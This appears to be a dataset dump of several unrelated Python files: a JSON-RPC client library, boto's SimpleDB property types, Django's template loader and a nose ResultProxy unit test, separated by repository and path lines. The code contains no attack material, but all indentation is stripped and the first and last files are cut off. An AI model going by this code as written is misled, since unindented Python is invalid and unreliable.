def getparser(self):
target = JSONTarget()
return JSONParser(target), target
class JSONParser(object):
def __init__(self, target):
self.target = target
def feed(self, data):
self.target.feed(data)
def close(self):
pass
class JSONTarget(object):
def __init__(self):
self.data = []
def feed(self, data):
self.data.append(data)
def close(self):
return ''.join(self.data)
class Transport(TransportMixIn, XMLTransport):
pass
class SafeTransport(TransportMixIn, XMLSafeTransport):
pass
from httplib import HTTP, HTTPConnection
from socket import socket
USE_UNIX_SOCKETS = False
try:
from socket import AF_UNIX, SOCK_STREAM
USE_UNIX_SOCKETS = True
except ImportError:
pass
if (USE_UNIX_SOCKETS):
class UnixHTTPConnection(HTTPConnection):
def connect(self):
self.sock = socket(AF_UNIX, SOCK_STREAM)
self.sock.connect(self.host)
class UnixHTTP(HTTP):
_connection_class = UnixHTTPConnection
class UnixTransport(TransportMixIn, XMLTransport):
def make_connection(self, host):
import httplib
host, extra_headers, x509 = self.get_host_info(host)
return UnixHTTP(host)
class ServerProxy(XMLServerProxy):
"""
Unfortunately, much more of this class has to be copied since
so much of it does the serialization.
"""
def __init__(self, uri, transport=None, encoding=None,
verbose=0, version=None):
import urllib
if not version:
version = config.version
self.__version = version
schema, uri = urllib.splittype(uri)
if schema not in ('http', 'https', 'unix'):
raise IOError('Unsupported JSON-RPC protocol.')
if schema == 'unix':
if not USE_UNIX_SOCKETS:
# Don't like the "generic" Exception...
raise UnixSocketMissing("Unix sockets not available.")
self.__host = uri
self.__handler = '/'
else:
self.__host, self.__handler = urllib.splithost(uri)
if not self.__handler:
# Not sure if this is in the JSON spec?
#self.__handler = '/'
self.__handler == '/'
if transport is None:
if schema == 'unix':
transport = UnixTransport()
elif schema == 'https':
transport = SafeTransport()
else:
transport = Transport()
self.__transport = transport
self.__encoding = encoding
self.__verbose = verbose
def _request(self, methodname, params, rpcid=None):
request = dumps(params, methodname, encoding=self.__encoding,
rpcid=rpcid, version=self.__version)
response = self._run_request(request)
check_for_errors(response)
return response['result']
def _request_notify(self, methodname, params, rpcid=None):
request = dumps(params, methodname, encoding=self.__encoding,
rpcid=rpcid, version=self.__version, notify=True)
response = self._run_request(request, notify=True)
check_for_errors(response)
return
def _run_request(self, request, notify=None):
history.add_request(request)
response = self.__transport.request(
self.__host,
self.__handler,
request,
verbose=self.__verbose
)
# Here, the XMLRPC library translates a single list
# response to the single value -- should we do the
# same, and require a tuple / list to be passed to
# the response object, or expect the Server to be
# outputting the response appropriately?
history.add_response(response)
if not response:
return None
return_obj = loads(response)
return return_obj
def __getattr__(self, name):
# Same as original, just with new _Method reference
return _Method(self._request, name)
@property
def _notify(self):
# Just like __getattr__, but with notify namespace.
return _Notify(self._request_notify)
class _Method(XML_Method):
def __call__(self, *args, **kwargs):
if len(args) > 0 and len(kwargs) > 0:
raise ProtocolError('Cannot use both positional ' +
'and keyword arguments (according to JSON-RPC spec.)')
if len(args) > 0:
return self.__send(self.__name, args)
else:
return self.__send(self.__name, kwargs)
def __getattr__(self, name):
self.__name = '%s.%s' % (self.__name, name)
return self
# The old method returned a new instance, but this seemed wasteful.
# The only thing that changes is the name.
#return _Method(self.__send, "%s.%s" % (self.__name, name))
class _Notify(object):
def __init__(self, request):
self._request = request
def __getattr__(self, name):
return _Method(self._request, name)
# Batch implementation
class MultiCallMethod(object):
def __init__(self, method, notify=False):
self.method = method
self.params = []
self.notify = notify
def __call__(self, *args, **kwargs):
if len(kwargs) > 0 and len(args) > 0:
raise ProtocolError('JSON-RPC does not support both ' +
'positional and keyword arguments.')
if len(kwargs) > 0:
self.params = kwargs
else:
self.params = args
def request(self, encoding=None, rpcid=None):
return dumps(self.params, self.method, version=2.0,
encoding=encoding, rpcid=rpcid, notify=self.notify)
def __repr__(self):
return '%s' % self.request()
def __getattr__(self, method):
new_method = '%s.%s' % (self.method, method)
self.method = new_method
return self
class MultiCallNotify(object):
def __init__(self, multicall):
self.multicall = multicall
def __getattr__(self, name):
new_job = MultiCallMethod(name, notify=True)
self.multicall._job_list.append(new_job)
return new_job
class MultiCallIterator(object):
def __init__(self, results):
self.results = results
def __iter__(self):
for i in range(0, len(self.results)):
yield self[i]
raise StopIteration
def __getitem__(self, i):
item = self.results[i]
check_for_errors(item)
return item['result']
def __len__(self):
return len(self.results)
class MultiCall(object):
def __init__(self, server):
self._server = server
self._job_list = []
def _request(self):
if len(self._job_list) < 1:
# Should we alert? This /is/ pretty obvious.
return
request_body = '[ %s ]' % ','.join([job.request() for
job in self._job_list])
responses = self._server._run_request(request_body)
del self._job_list[:]
if not responses:
responses = []
return MultiCallIterator(responses)
@property
def _notify(self):
return MultiCallNotify(self)
def __getattr__(self, name):
new_job = MultiCallMethod(name)
self._job_list.append(new_job)
return new_job
__call__ = _request
# These lines conform to xmlrpclib's "compatibility" line.
# Not really sure if we should include these, but oh well.
Server = ServerProxy
class Fault(object):
# JSON-RPC error class
def __init__(self, code=-32000, message='Server error', rpcid=None):
self.faultCode = code
self.faultString = message
self.rpcid = rpcid
def error(self):
return {'code':self.faultCode, 'message':self.faultString}
def response(self, rpcid=None, version=None):
if not version:
version = config.version
if rpcid:
self.rpcid = rpcid
return dumps(
self, methodresponse=True, rpcid=self.rpcid, version=version
)
def __repr__(self):
return '<Fault %s: %s>' % (self.faultCode, self.faultString)
def random_id(length=8):
return_id = ''
for i in range(length):
return_id += random.choice(IDCHARS)
return return_id
class Payload(dict):
def __init__(self, rpcid=None, version=None):
if not version:
version = config.version
self.id = rpcid
self.version = float(version)
def request(self, method, params=[]):
if type(method) not in types.StringTypes:
raise ValueError('Method name must be a string.')
if not self.id:
self.id = random_id()
request = { 'id':self.id, 'method':method }
if params:
request['params'] = params
if self.version >= 2:
request['jsonrpc'] = str(self.version)
return request
def notify(self, method, params=[]):
request = self.request(method, params)
if self.version >= 2:
del request['id']
else:
request['id'] = None
return request
def response(self, result=None):
response = {'result':result, 'id':self.id}
if self.version >= 2:
response['jsonrpc'] = str(self.version)
else:
response['error'] = None
return response
def error(self, code=-32000, message='Server error.'):
error = self.response()
if self.version >= 2:
del error['result']
else:
error['result'] = None
error['error'] = {'code':code, 'message':message}
return error
def dumps(params=[], methodname=None, methodresponse=None,
encoding=None, rpcid=None, version=None, notify=None):
"""
This differs from the Python implementation in that it implements
the rpcid argument since the 2.0 spec requires it for responses.
"""
if not version:
version = config.version
valid_params = (types.TupleType, types.ListType, types.DictType)
if methodname in types.StringTypes and \
type(params) not in valid_params and \
not isinstance(params, Fault):
"""
If a method, and params are not in a listish or a Fault,
error out.
"""
raise TypeError('Params must be a dict, list, tuple or Fault ' +
'instance.')
# Begin parsing object
payload = Payload(rpcid=rpcid, version=version)
if not encoding:
encoding = 'utf-8'
if type(params) is Fault:
response = payload.error(params.faultCode, params.faultString)
return jdumps(response, encoding=encoding)
if type(methodname) not in types.StringTypes and methodresponse != True:
raise ValueError('Method name must be a string, or methodresponse '+
'must be set to True.')
if config.use_jsonclass == True:
from jsonrpclib import jsonclass
params = jsonclass.dump(params)
if methodresponse is True:
if rpcid is None:
raise ValueError('A method response must have an rpcid.')
response = payload.response(params)
return jdumps(response, encoding=encoding)
request = None
if notify == True:
request = payload.notify(methodname, params)
else:
request = payload.request(methodname, params)
return jdumps(request, encoding=encoding)
def loads(data):
"""
This differs from the Python implementation, in that it returns
the request structure in Dict format instead of the method, params.
It will return a list in the case of a batch request / response.
"""
if data == '':
# notification
return None
result = jloads(data)
# if the above raises an error, the implementing server code
# should return something like the following:
# { 'jsonrpc':'2.0', 'error': fault.error(), id: None }
if config.use_jsonclass == True:
from jsonrpclib import jsonclass
result = jsonclass.load(result)
return result
def check_for_errors(result):
if not result:
# Notification
return result
if type(result) is not types.DictType:
raise TypeError('Response is not a dict.')
if 'jsonrpc' in result.keys() and float(result['jsonrpc']) > 2.0:
raise NotImplementedError('JSON-RPC version not yet supported.')
if 'result' not in result.keys() and 'error' not in result.keys():
raise ValueError('Response does not have a result or error key.')
if 'error' in result.keys() and result['error'] != None:
code = result['error']['code']
message = result['error']['message']
raise ProtocolError((code, message))
return result
def isbatch(result):
if type(result) not in (types.ListType, types.TupleType):
return False
if len(result) < 1:
return False
if type(result[0]) is not types.DictType:
return False
if 'jsonrpc' not in result[0].keys():
return False
try:
version = float(result[0]['jsonrpc'])
except ValueError:
raise ProtocolError('"jsonrpc" key must be a float(able) value.')
if version < 2:
return False
return True
def isnotification(request):
if 'id' not in request.keys():
# 2.0 notification
return True
if request['id'] == None:
# 1.0 notification
return True
return False
|
christianbaun/octopuscloud
|
refs/heads/master
|
boto/sdb/db/property.py
|
1
|
# Copyright (c) 2006,2007,2008 Mitch Garnaat http://garnaat.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import datetime
from key import Key
from boto.utils import Password
from boto.sdb.db.query import Query
import re
import boto
import boto.s3.key
from boto.sdb.db.blob import Blob
class Property(object):
data_type = str
type_name = ''
name = ''
verbose_name = ''
def __init__(self, verbose_name=None, name=None, default=None, required=False,
validator=None, choices=None, unique=False):
self.verbose_name = verbose_name
self.name = name
self.default = default
self.required = required
self.validator = validator
self.choices = choices
self.slot_name = '_'
self.unique = unique
def __get__(self, obj, objtype):
if obj:
obj.load()
return getattr(obj, self.slot_name)
else:
return None
def __set__(self, obj, value):
self.validate(value)
# Fire off any on_set functions
try:
if obj._loaded and hasattr(obj, "on_set_%s" % self.name):
fnc = getattr(obj, "on_set_%s" % self.name)
value = fnc(value)
except Exception:
boto.log.exception("Exception running on_set_%s" % self.name)
setattr(obj, self.slot_name, value)
def __property_config__(self, model_class, property_name):
self.model_class = model_class
self.name = property_name
self.slot_name = '_' + self.name
def default_validator(self, value):
if value == self.default_value():
return
if not isinstance(value, self.data_type):
raise TypeError, 'Validation Error, expecting %s, got %s' % (self.data_type, type(value))
def default_value(self):
return self.default
def validate(self, value):
if self.required and value==None:
raise ValueError, '%s is a required property' % self.name
if self.choices and value and not value in self.choices:
raise ValueError, '%s not a valid choice for %s.%s' % (value, self.model_class.__name__, self.name)
if self.validator:
self.validator(value)
else:
self.default_validator(value)
return value
def empty(self, value):
return not value
def get_value_for_datastore(self, model_instance):
return getattr(model_instance, self.name)
def make_value_from_datastore(self, value):
return value
def get_choices(self):
if callable(self.choices):
return self.choices()
return self.choices
def validate_string(value):
if isinstance(value, str) or isinstance(value, unicode):
if len(value) > 1024:
raise ValueError, 'Length of value greater than maxlength'
else:
raise TypeError, 'Expecting String, got %s' % type(value)
class StringProperty(Property):
type_name = 'String'
def __init__(self, verbose_name=None, name=None, default='', required=False,
validator=validate_string, choices=None, unique=False):
Property.__init__(self, verbose_name, name, default, required, validator, choices, unique)
class TextProperty(Property):
type_name = 'Text'
def __init__(self, verbose_name=None, name=None, default='', required=False,
validator=None, choices=None, unique=False, max_length=None):
Property.__init__(self, verbose_name, name, default, required, validator, choices, unique)
self.max_length = max_length
def validate(self, value):
if not isinstance(value, str) and not isinstance(value, unicode):
raise TypeError, 'Expecting Text, got %s' % type(value)
if self.max_length and len(value) > self.max_length:
raise ValueError, 'Length of value greater than maxlength %s' % self.max_length
class PasswordProperty(StringProperty):
"""
Hashed property who's original value can not be
retrieved, but still can be compaired.
"""
data_type = Password
type_name = 'Password'
def __init__(self, verbose_name=None, name=None, default='', required=False,
validator=None, choices=None, unique=False):
StringProperty.__init__(self, verbose_name, name, default, required, validator, choices, unique)
def make_value_from_datastore(self, value):
p = Password(value)
return p
def get_value_for_datastore(self, model_instance):
value = StringProperty.get_value_for_datastore(self, model_instance)
if value and len(value):
return str(value)
else:
return None
def __set__(self, obj, value):
if not isinstance(value, Password):
p = Password()
p.set(value)
value = p
Property.__set__(self, obj, value)
def __get__(self, obj, objtype):
return Password(StringProperty.__get__(self, obj, objtype))
def validate(self, value):
value = Property.validate(self, value)
if isinstance(value, Password):
if len(value) > 1024:
raise ValueError, 'Length of value greater than maxlength'
else:
raise TypeError, 'Expecting Password, got %s' % type(value)
class BlobProperty(Property):
data_type = Blob
type_name = "blob"
def __set__(self, obj, value):
if value != self.default_value():
if not isinstance(value, Blob):
oldb = self.__get__(obj, type(obj))
id = None
if oldb:
id = oldb.id
b = Blob(value=value, id=id)
value = b
Property.__set__(self, obj, value)
class S3KeyProperty(Property):
data_type = boto.s3.key.Key
type_name = 'S3Key'
validate_regex = "^s3:\/\/([^\/]*)\/(.*)$"
def __init__(self, verbose_name=None, name=None, default=None,
required=False, validator=None, choices=None, unique=False):
Property.__init__(self, verbose_name, name, default, required,
validator, choices, unique)
def validate(self, value):
if value == self.default_value() or value == str(self.default_value()):
return self.default_value()
if isinstance(value, self.data_type):
return
match = re.match(self.validate_regex, value)
if match:
return
raise TypeError, 'Validation Error, expecting %s, got %s' % (self.data_type, type(value))
def __get__(self, obj, objtype):
value = Property.__get__(self, obj, objtype)
if value:
if isinstance(value, self.data_type):
return value
match = re.match(self.validate_regex, value)
if match:
s3 = obj._manager.get_s3_connection()
bucket = s3.get_bucket(match.group(1), validate=False)
k = bucket.get_key(match.group(2))
if not k:
k = bucket.new_key(match.group(2))
k.set_contents_from_string("")
return k
else:
return value
def get_value_for_datastore(self, model_instance):
value = Property.get_value_for_datastore(self, model_instance)
if value:
return "s3://%s/%s" % (value.bucket.name, value.name)
else:
return None
class IntegerProperty(Property):
data_type = int
type_name = 'Integer'
def __init__(self, verbose_name=None, name=None, default=0, required=False,
validator=None, choices=None, unique=False, max=2147483647, min=-2147483648):
Property.__init__(self, verbose_name, name, default, required, validator, choices, unique)
self.max = max
self.min = min
def validate(self, value):
value = int(value)
value = Property.validate(self, value)
if value > self.max:
raise ValueError, 'Maximum value is %d' % self.max
if value < self.min:
raise ValueError, 'Minimum value is %d' % self.min
return value
def empty(self, value):
return value is None
def __set__(self, obj, value):
if value == "" or value == None:
value = 0
return Property.__set__(self, obj, value)
class LongProperty(Property):
data_type = long
type_name = 'Long'
def __init__(self, verbose_name=None, name=None, default=0, required=False,
validator=None, choices=None, unique=False):
Property.__init__(self, verbose_name, name, default, required, validator, choices, unique)
def validate(self, value):
value = long(value)
value = Property.validate(self, value)
min = -9223372036854775808
max = 9223372036854775807
if value > max:
raise ValueError, 'Maximum value is %d' % max
if value < min:
raise ValueError, 'Minimum value is %d' % min
return value
def empty(self, value):
return value is None
class BooleanProperty(Property):
data_type = bool
type_name = 'Boolean'
def __init__(self, verbose_name=None, name=None, default=False, required=False,
validator=None, choices=None, unique=False):
Property.__init__(self, verbose_name, name, default, required, validator, choices, unique)
def empty(self, value):
return value is None
class FloatProperty(Property):
data_type = float
type_name = 'Float'
def __init__(self, verbose_name=None, name=None, default=0.0, required=False,
validator=None, choices=None, unique=False):
Property.__init__(self, verbose_name, name, default, required, validator, choices, unique)
def validate(self, value):
value = float(value)
value = Property.validate(self, value)
return value
def empty(self, value):
return value is None
class DateTimeProperty(Property):
data_type = datetime.datetime
type_name = 'DateTime'
def __init__(self, verbose_name=None, auto_now=False, auto_now_add=False, name=None,
default=None, required=False, validator=None, choices=None, unique=False):
Property.__init__(self, verbose_name, name, default, required, validator, choices, unique)
self.auto_now = auto_now
self.auto_now_add = auto_now_add
def default_value(self):
if self.auto_now or self.auto_now_add:
return self.now()
return Property.default_value(self)
def validate(self, value):
if value == None:
return
if not isinstance(value, self.data_type):
raise TypeError, 'Validation Error, expecting %s, got %s' % (self.data_type, type(value))
def get_value_for_datastore(self, model_instance):
if self.auto_now:
setattr(model_instance, self.name, self.now())
return Property.get_value_for_datastore(self, model_instance)
def now(self):
return datetime.datetime.utcnow()
class DateProperty(Property):
data_type = datetime.date
type_name = 'Date'
def __init__(self, verbose_name=None, auto_now=False, auto_now_add=False, name=None,
default=None, required=False, validator=None, choices=None, unique=False):
Property.__init__(self, verbose_name, name, default, required, validator, choices, unique)
self.auto_now = auto_now
self.auto_now_add = auto_now_add
def default_value(self):
if self.auto_now or self.auto_now_add:
return self.now()
return Property.default_value(self)
def validate(self, value):
if value == None:
return
if not isinstance(value, self.data_type):
raise TypeError, 'Validation Error, expecting %s, got %s' % (self.data_type, type(value))
def get_value_for_datastore(self, model_instance):
if self.auto_now:
setattr(model_instance, self.name, self.now())
return Property.get_value_for_datastore(self, model_instance)
def now(self):
return datetime.date.today()
class ReferenceProperty(Property):
data_type = Key
type_name = 'Reference'
def __init__(self, reference_class=None, collection_name=None,
verbose_name=None, name=None, default=None, required=False, validator=None, choices=None, unique=False):
Property.__init__(self, verbose_name, name, default, required, validator, choices, unique)
self.reference_class = reference_class
self.collection_name = collection_name
def __get__(self, obj, objtype):
if obj:
value = getattr(obj, self.slot_name)
if value == self.default_value():
return value
# If the value is still the UUID for the referenced object, we need to create
# the object now that is the attribute has actually been accessed. This lazy
# instantiation saves unnecessary roundtrips to SimpleDB
if isinstance(value, str) or isinstance(value, unicode):
value = self.reference_class(value)
setattr(obj, self.name, value)
return value
def __property_config__(self, model_class, property_name):
Property.__property_config__(self, model_class, property_name)
if self.collection_name is None:
self.collection_name = '%s_%s_set' % (model_class.__name__.lower(), self.name)
if hasattr(self.reference_class, self.collection_name):
raise ValueError, 'duplicate property: %s' % self.collection_name
setattr(self.reference_class, self.collection_name,
_ReverseReferenceProperty(model_class, property_name, self.collection_name))
def check_uuid(self, value):
# This does a bit of hand waving to "type check" the string
t = value.split('-')
if len(t) != 5:
raise ValueError
def check_instance(self, value):
try:
obj_lineage = value.get_lineage()
cls_lineage = self.reference_class.get_lineage()
if obj_lineage.startswith(cls_lineage):
return
raise TypeError, '%s not instance of %s' % (obj_lineage, cls_lineage)
except:
raise ValueError, '%s is not a Model' % value
def validate(self, value):
if self.required and value==None:
raise ValueError, '%s is a required property' % self.name
if value == self.default_value():
return
if not isinstance(value, str) and not isinstance(value, unicode):
self.check_instance(value)
class _ReverseReferenceProperty(Property):
data_type = Query
type_name = 'query'
def __init__(self, model, prop, name):
self.__model = model
self.__property = prop
self.collection_name = prop
self.name = name
self.item_type = model
def __get__(self, model_instance, model_class):
"""Fetches collection of model instances of this collection property."""
if model_instance is not None:
query = Query(self.__model)
if type(self.__property) == list:
props = []
for prop in self.__property:
props.append("%s =" % prop)
return query.filter(props, model_instance)
else:
return query.filter(self.__property + ' =', model_instance)
else:
return self
def __set__(self, model_instance, value):
"""Not possible to set a new collection."""
raise ValueError, 'Virtual property is read-only'
class CalculatedProperty(Property):
def __init__(self, verbose_name=None, name=None, default=None,
required=False, validator=None, choices=None,
calculated_type=int, unique=False, use_method=False):
Property.__init__(self, verbose_name, name, default, required,
validator, choices, unique)
self.calculated_type = calculated_type
self.use_method = use_method
def __get__(self, obj, objtype):
value = self.default_value()
if obj:
try:
value = getattr(obj, self.slot_name)
if self.use_method:
value = value()
except AttributeError:
pass
return value
def __set__(self, obj, value):
"""Not possible to set a new AutoID."""
pass
def _set_direct(self, obj, value):
if not self.use_method:
setattr(obj, self.slot_name, value)
def get_value_for_datastore(self, model_instance):
if self.calculated_type in [str, int, bool]:
value = self.__get__(model_instance, model_instance.__class__)
return value
else:
return None
class ListProperty(Property):
data_type = list
type_name = 'List'
def __init__(self, item_type, verbose_name=None, name=None, default=None, **kwds):
if default is None:
default = []
self.item_type = item_type
Property.__init__(self, verbose_name, name, default=default, required=True, **kwds)
def validate(self, value):
if value is not None:
if not isinstance(value, list):
value = [value]
if self.item_type in (int, long):
item_type = (int, long)
elif self.item_type in (str, unicode):
item_type = (str, unicode)
else:
item_type = self.item_type
for item in value:
if not isinstance(item, item_type):
if item_type == (int, long):
raise ValueError, 'Items in the %s list must all be integers.' % self.name
else:
raise ValueError('Items in the %s list must all be %s instances' %
(self.name, self.item_type.__name__))
return value
def empty(self, value):
return value is None
def default_value(self):
return list(super(ListProperty, self).default_value())
def __set__(self, obj, value):
"""Override the set method to allow them to set the property to an instance of the item_type instead of requiring a list to be passed in"""
if self.item_type in (int, long):
item_type = (int, long)
elif self.item_type in (str, unicode):
item_type = (str, unicode)
else:
item_type = self.item_type
if isinstance(value, item_type):
value = [value]
elif value == None: # Override to allow them to set this to "None" to remove everything
value = []
return super(ListProperty, self).__set__(obj,value)
class MapProperty(Property):
data_type = dict
type_name = 'Map'
def __init__(self, item_type=str, verbose_name=None, name=None, default=None, **kwds):
if default is None:
default = {}
self.item_type = item_type
Property.__init__(self, verbose_name, name, default=default, required=True, **kwds)
def validate(self, value):
if value is not None:
if not isinstance(value, dict):
raise ValueError, 'Value must of type dict'
if self.item_type in (int, long):
item_type = (int, long)
elif self.item_type in (str, unicode):
item_type = (str, unicode)
else:
item_type = self.item_type
for key in value:
if not isinstance(value[key], item_type):
if item_type == (int, long):
raise ValueError, 'Values in the %s Map must all be integers.' % self.name
else:
raise ValueError('Values in the %s Map must all be %s instances' %
(self.name, self.item_type.__name__))
return value
def empty(self, value):
return value is None
def default_value(self):
return {}
|
andymckay/django
|
refs/heads/master
|
django/template/loader.py
|
83
|
# Wrapper for loading templates from storage of some sort (e.g. filesystem, database).
#
# This uses the TEMPLATE_LOADERS setting, which is a list of loaders to use.
# Each loader is expected to have this interface:
#
# callable(name, dirs=[])
#
# name is the template name.
# dirs is an optional list of directories to search instead of TEMPLATE_DIRS.
#
# The loader should return a tuple of (template_source, path). The path returned
# might be shown to the user for debugging purposes, so it should identify where
# the template was loaded from.
#
# A loader may return an already-compiled template instead of the actual
# template source. In that case the path returned should be None, since the
# path information is associated with the template during the compilation,
# which has already been done.
#
# Each loader should have an "is_usable" attribute set. This is a boolean that
# specifies whether the loader can be used in this Python installation. Each
# loader is responsible for setting this when it's initialized.
#
# For example, the eggs loader (which is capable of loading templates from
# Python eggs) sets is_usable to False if the "pkg_resources" module isn't
# installed, because pkg_resources is necessary to read eggs.
from django.core.exceptions import ImproperlyConfigured
from django.template.base import Origin, Template, Context, TemplateDoesNotExist, add_to_builtins
from django.utils.importlib import import_module
from django.conf import settings
template_source_loaders = None
class BaseLoader(object):
is_usable = False
def __init__(self, *args, **kwargs):
pass
def __call__(self, template_name, template_dirs=None):
return self.load_template(template_name, template_dirs)
def load_template(self, template_name, template_dirs=None):
source, display_name = self.load_template_source(template_name, template_dirs)
origin = make_origin(display_name, self.load_template_source, template_name, template_dirs)
try:
template = get_template_from_string(source, origin, template_name)
return template, None
except TemplateDoesNotExist:
# If compiling the template we found raises TemplateDoesNotExist, back off to
# returning the source and display name for the template we were asked to load.
# This allows for correct identification (later) of the actual template that does
# not exist.
return source, display_name
def load_template_source(self, template_name, template_dirs=None):
"""
Returns a tuple containing the source and origin for the given template
name.
"""
raise NotImplementedError
def reset(self):
"""
Resets any state maintained by the loader instance (e.g., cached
templates or cached loader modules).
"""
pass
class LoaderOrigin(Origin):
def __init__(self, display_name, loader, name, dirs):
super(LoaderOrigin, self).__init__(display_name)
self.loader, self.loadname, self.dirs = loader, name, dirs
def reload(self):
return self.loader(self.loadname, self.dirs)[0]
def make_origin(display_name, loader, name, dirs):
if settings.TEMPLATE_DEBUG and display_name:
return LoaderOrigin(display_name, loader, name, dirs)
else:
return None
def find_template_loader(loader):
if isinstance(loader, (tuple, list)):
loader, args = loader[0], loader[1:]
else:
args = []
if isinstance(loader, basestring):
module, attr = loader.rsplit('.', 1)
try:
mod = import_module(module)
except ImportError, e:
raise ImproperlyConfigured('Error importing template source loader %s: "%s"' % (loader, e))
try:
TemplateLoader = getattr(mod, attr)
except AttributeError, e:
raise ImproperlyConfigured('Error importing template source loader %s: "%s"' % (loader, e))
if hasattr(TemplateLoader, 'load_template_source'):
func = TemplateLoader(*args)
else:
# Try loading module the old way - string is full path to callable
if args:
raise ImproperlyConfigured("Error importing template source loader %s - can't pass arguments to function-based loader." % loader)
func = TemplateLoader
if not func.is_usable:
import warnings
warnings.warn("Your TEMPLATE_LOADERS setting includes %r, but your Python installation doesn't support that type of template loading. Consider removing that line from TEMPLATE_LOADERS." % loader)
return None
else:
return func
else:
raise ImproperlyConfigured('Loader does not define a "load_template" callable template source loader')
def find_template(name, dirs=None):
# Calculate template_source_loaders the first time the function is executed
# because putting this logic in the module-level namespace may cause
# circular import errors. See Django ticket #1292.
global template_source_loaders
if template_source_loaders is None:
loaders = []
for loader_name in settings.TEMPLATE_LOADERS:
loader = find_template_loader(loader_name)
if loader is not None:
loaders.append(loader)
template_source_loaders = tuple(loaders)
for loader in template_source_loaders:
try:
source, display_name = loader(name, dirs)
return (source, make_origin(display_name, loader, name, dirs))
except TemplateDoesNotExist:
pass
raise TemplateDoesNotExist(name)
def get_template(template_name):
"""
Returns a compiled Template object for the given template name,
handling template inheritance recursively.
"""
template, origin = find_template(template_name)
if not hasattr(template, 'render'):
# template needs to be compiled
template = get_template_from_string(template, origin, template_name)
return template
def get_template_from_string(source, origin=None, name=None):
"""
Returns a compiled Template object for the given template code,
handling template inheritance recursively.
"""
return Template(source, origin, name)
def render_to_string(template_name, dictionary=None, context_instance=None):
"""
Loads the given template_name and renders it with the given dictionary as
context. The template_name may be a string to load a single template using
get_template, or it may be a tuple to use select_template to find one of
the templates in the list. Returns a string.
"""
dictionary = dictionary or {}
if isinstance(template_name, (list, tuple)):
t = select_template(template_name)
else:
t = get_template(template_name)
if not context_instance:
return t.render(Context(dictionary))
# Add the dictionary to the context stack, ensuring it gets removed again
# to keep the context_instance in the same state it started in.
context_instance.update(dictionary)
try:
return t.render(context_instance)
finally:
context_instance.pop()
def select_template(template_name_list):
"Given a list of template names, returns the first that can be loaded."
if not template_name_list:
raise TemplateDoesNotExist("No template names provided")
not_found = []
for template_name in template_name_list:
try:
return get_template(template_name)
except TemplateDoesNotExist, e:
if e.args[0] not in not_found:
not_found.append(e.args[0])
continue
# If we get here, none of the templates could be loaded
raise TemplateDoesNotExist(', '.join(not_found))
add_to_builtins('django.template.loader_tags')
|
cloudera/hue
|
refs/heads/master
|
desktop/core/ext-py/nose-1.3.7/unit_tests/test_result_proxy.py
|
10
|
import sys
import unittest
from inspect import ismethod
from nose.config import Config
from nose.proxy import ResultProxyFactory, ResultProxy
from mock import RecordingPluginManager
class TestResultProxy(unittest.TestCase):
def test_proxy_has_basic_methods(self):
res = unittest.TestResult()
proxy = ResultProxy(res, test=None)
methods = [ 'addError', 'addFailure', 'addSuccess',
'startTest', 'stopTest', 'stop' ]
for method in methods:
m = getattr(proxy, method)
assert ismethod(m), "%s is not a method" % method
def test_proxy_has_nose_methods(self):
res = unittest.TestResult()
proxy = ResultProxy(res, test=None)
methods = [ 'beforeTest', 'afterTest' ]
for method in methods:
m = getattr(proxy, method)
assert ismethod(m), "%s is not a method" % method
def test_proxy_proxies(self):
from nose.case import Test
class Dummy:
def __init__(self):
self.__dict__['called'] = []
def __getattr__(self, attr):
c = self.__dict__['called']
c.append(attr)
def dummy(*arg, **kw):
pass
return dummy
class TC(unittest.TestCase):
def runTest(self):
pass
try:
raise Exception("exception")
except:
err = sys.exc_info()
test = TC()
case = Test(test)
res = Dummy()
proxy = ResultProxy(res, test=case)
proxy.addError(test, err)
proxy.addFailure(test, err)
proxy.addSuccess(test)
proxy.startTest(test)
proxy.stopTest(test)
proxy.beforeTest(test)
proxy.afterTest(test)
proxy.stop()
proxy.shouldStop = 'yes please'
for method in ['addError', 'addFailure', 'addSuccess',
'startTest', 'stopTest', 'beforeTest', 'afterTest',
'stop']:
assert method in res.called, "%s was not proxied"
self.assertEqual(res.shouldStop, 'yes please')
def test_attributes_are_proxied(self):
res = unittest.TestResult()
proxy = ResultProxy(res, test=None)
proxy.errors
proxy.failures
proxy.shouldStop
proxy.testsRun
def test_test_cases_can_access_result_attributes(self):
from nose.case import Test
class TC(unittest.TestCase):
def run(self, result):
unittest.TestCase.run(self, result)
print "errors", result.errors
print "failures", result.failures
def runTest(self):
pass
test = TC()
case = Test(test)
res = unittest.TestResult()
proxy = ResultProxy(res, test=case)
case(proxy)
def test_proxy_handles_missing_methods(self):
from nose.case import Test
class TC(unittest.TestCase):
def runTest(self):
pass
test = TC()
case = Test(test)
res = unittest.TestResult()
proxy = ResultProxy(res, case)
proxy.beforeTest(test)
proxy.afterTest(test)
def test_proxy_calls_plugins(self):
from nose.case import Test
res = unittest.TestResult()
class TC(unittest.TestCase):
def test_error(self):
print "So long"
raise TypeError("oops")
def test_fail(self):
print "Hello"
self.fail()
def test(self):
pass
plugs = RecordingPluginManager()
config = Config(plugins=plugs)
factory = ResultProxyFactory(config=config)
case_e = Test(TC('test_error'))
case_f = Test(TC('test_fail'))
case_t = Test(TC('test'))
pres_e = factory(res, case_e)
case_e(pres_e)
assert 'beforeTest' in plugs.called
assert 'startTest' in plugs.called
assert 'addError' in plugs.called
assert 'stopTest' in plugs.called
assert 'afterTest' in plugs.called
plugs.reset()
pres_f = factory(res, case_f)
case_f(pres_f)
assert 'beforeTest' in plugs.called
assert 'startTest' in plugs.called
assert 'addFailure' in plugs.called
assert 'stopTest' in plugs.called
assert 'afterTest' in plugs.called
plugs.reset()
pres_t = factory(res, case_t)
case_t(pres_t)
